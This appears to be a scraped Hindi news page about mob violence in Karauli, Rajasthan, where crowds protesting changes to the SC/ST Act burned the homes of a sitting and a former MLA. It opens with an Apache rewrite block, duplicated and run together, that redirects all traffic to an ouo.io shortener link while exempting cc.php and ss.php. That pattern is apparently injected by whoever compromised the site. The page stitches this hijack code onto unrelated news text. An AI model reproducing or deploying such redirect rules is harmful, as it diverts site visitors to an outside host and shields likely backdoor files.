
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 713
करौली। एससी/एसीटी एक्ट में बदलाव को लेकर देशभर के अलग-अलग राज्यों में कल हुई हिंसा अभी थमने का नाम नहीं ले रही है। आज करौली में हिंसक भीड़ ने दो नेताओं के घरों को निशाना बनाया है। भीड़ ने मौजूदा विधायक राजकुमारी जाटव और पूर्व विधायक भरोसीलाल जाटव के घरों में आग लगा दी। वहीं एक शॉपिंग मॉल में भी तोड़फोड़ की गई है। इसके अलावा देश के दूसरे हिस्सों में स्थिति नाजुक लेकिन नियंत्रण में है। हिंसा फैलाने वालों की धरपकड़ की जा रही है। मौजूदा विधायक राजकुमारी जाटव भाजपा नेता हैं, जबकि पूर्व विधायक कांग्रेस के नेता हैं। बताया जा रहा है कि इलाके में कल हुई हिंसा के जवाब में आज सुबह यहां भीड़ जमा होने लगी। धारा 144 लागू होने के बावजूद धीरे-धीरे ये संख्या 40 हजार तक पहुंच गई।
करौली जिले के हिंडौन में कल दुकान और वाहन जलाए जाने के खिलाफ व्यापारी और दूसरे समाज के लोगों ने आज बंद का आह्वान किया था। इसी दौरान बड़ी संख्या में लोग कलेक्टर को ज्ञापन देने जा रहे थे। हालात तनावपूर्ण देखते हुए इलाके में धारा 144 लागू की गई थी। लेकिन इसका उल्लंघन करते हुए बड़ी संख्या में लोग जमा हो गए। भीड़ को नियंत्रित करने के लिए पुलिस को लाठीचार्ज करना पड़ा। बताया जा रहा है कि इसी दौरान भीड़ ने करौली से वर्तमान भाजपा विधायक राजकुमारी जाटव के घर को निशाना बनाया और आग लगा दी। इतना ही नहीं भीड़ ने पूर्व विधायक को भी नहीं बख्शा। इलाके के पूर्व कांग्रेस विधायक भरोसीलाल जाटव के घर को भी आग के हवाले कर दिया गया। दलितों का विरोध देखने के बाद केंद्र सरकार ने कल ही इस मसले पर सुप्रीम कोर्ट में पुनर्विचार याचिका दायर की थी।